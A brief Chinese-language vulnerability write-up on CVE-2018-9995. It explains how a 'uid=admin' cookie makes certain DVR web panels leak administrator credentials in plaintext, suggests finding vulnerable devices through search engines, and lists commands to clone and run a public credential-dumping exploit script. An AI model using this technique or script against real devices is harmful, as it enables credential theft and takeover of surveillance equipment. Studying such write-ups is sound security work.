漏洞描述
DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机,相对于传统的模拟摄像录像机,采用硬盘录像,故常常被称为硬盘录像机,也被称为DVR。它是一套进行图像计算存储处理的计算机系统,具有对图像/语音和动态帧等进行长时间录像、录音、远程监视和控制的功能,DVR集合了录像机、画面分割器、云台镜头控制、报警控制、网络传输等五种功能于一身,用一台设备就能取代模拟监控系统一大堆设备的功能。
最初由阿根廷研究员发现,通过使用“Cookie: uid = admin”的Cookie标头来访问特定DVR的控制面板,DVR将以明文形式响应设备的管理员凭证。并且在GitHub发布了相关验证说明。
漏洞分析
类别:访问控制失效。访问DVR系列产品的WEB端时,设置如下cookie:uid=admin可绕过访问控制,获取设备内的用户名及登陆凭证。利用搜索引擎搜索存在漏洞的版本
CVE利用
git clone
https://github.com/ezelf/CVE-2018-9995_dvr_credentials
cd CVE-2018-9995_dvr_credentials
pip3 install -r requirements.txt
python3 getDVR_Credentials.py
利用成功后获取账号密码,登入后台。
※ 此实验仅供大家学习参考,其他违法行为本人不负任何责任,在此申明!
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650457253&idx=3&sn=6f9ca9812e40b417b1f490fb7cea3729&chksm=83bba141b4cc28574b215e45f2850a2d9ae8eb1dbcc1cac6651f02a65c4fe0f0a6233df84e6b#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh